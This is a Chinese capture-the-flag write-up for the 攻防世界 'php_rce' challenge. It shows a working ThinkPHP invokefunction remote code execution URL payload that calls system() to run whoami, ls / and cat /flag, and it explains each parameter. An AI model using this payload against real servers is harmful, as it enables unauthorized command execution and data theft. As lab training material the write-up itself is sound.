88.[4]攻防世界 web php_rce

之前做过,回顾(看了眼之前的wp,跟没做过一样)

属于远程命令执行漏洞

在 PHP 里,system()exec()shell_exec()、反引号(`)等都可用于执行系统命令。

直接访问index.php没效果

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
  • s=index/think\app/invokefunction :这部分指定了要调用的控制器和方法。在 ThinkPHP 框架里,路由解析机制允许通过这种方式指定要执行的操作,攻击者利用这个特性来调用框架内部的 invokefunction 方法。
  • function=call_user_func_arraycall_user_func_array 是 PHP 的一个内置函数,它能够以数组形式传递参数来调用指定的函数。攻击者利用此函数来动态调用其他函数。
  • vars[0]=system :这里将 system 作为要调用的函数名。system 是 PHP 中用于执行系统命令的函数。
  • vars[1][]=whoami :这是传递给 system 函数的参数,也就是要执行的系统命令。whoami 命令的作用是显示当前系统用户的名称。
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

ls / 用于列出根目录(/)下的所有文件和文件夹。

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat  
 /flag

cat 用于查看文件内容。

相关推荐
NPE~2 小时前
[漏洞篇]SQL注入漏洞详解
数据库·安全·渗透测试·教程·漏洞·sql注入
玥轩_5212 小时前
《Linux服务与安全管理》| 数据库服务器安装和配置
linux·运维·服务器·数据库·安全·网络安全·redhat
C7211BA4 小时前
使用大语言模型在表格化网络安全数据中进行高效异常检测
人工智能·web安全·语言模型
doubt。6 小时前
3.[羊城杯2020]easyphp
网络·安全·web安全·网络安全·php·代码复审
美味小鱼7 小时前
Rust枚举(Enum)完全指南:用类型安全表达多样性
开发语言·安全·rust
我的运维人生8 小时前
安全漏洞扫描与修复系统的高质量技术详解
网络·安全·web安全·运维开发·技术共享
黑客笔记9 小时前
Weevely代码分析
web安全·网络安全
doubt。9 小时前
6.攻防世界php_rce
网络·安全·web安全·网络安全
aaaweiaaaaaa9 小时前
upload labs靶场
计算机网络·web安全·网络安全·状态模式